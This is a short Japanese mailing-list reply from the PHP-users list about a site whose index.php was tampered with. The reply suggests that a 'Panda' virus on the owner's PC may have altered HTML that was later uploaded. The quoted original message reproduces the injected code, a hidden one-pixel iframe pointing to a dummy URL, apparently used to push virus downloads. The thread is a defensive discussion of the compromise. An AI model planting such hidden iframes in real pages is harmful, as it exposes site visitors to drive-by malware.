[PHP-users 32324] Re: index.php に対する不正な書き換え

矢嶋秀樹 mio @ dis.twmu.ac.jp

矢嶋と申します。

> ■先日、自分の管理していたサイトのPHPのスクリプトの一部に、以下のような
> コードが勝手に挿入されてしまいました。
>
> <iframe src='http://dummy/logo/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>
>
> リンク先のURLはダミーですが、ウイルスをダウンロードさせるためのリンク
> のようです。

・アイコンを「パンダ」にするウイルスが蔓延、Webアクセスで感染
	http://itpro.nikkeibp.co.jp/article/NEWS/20070202/260515/

これに感染しPC内で改変された html を、
サーバーにアップロードしたという可能性はありませんか?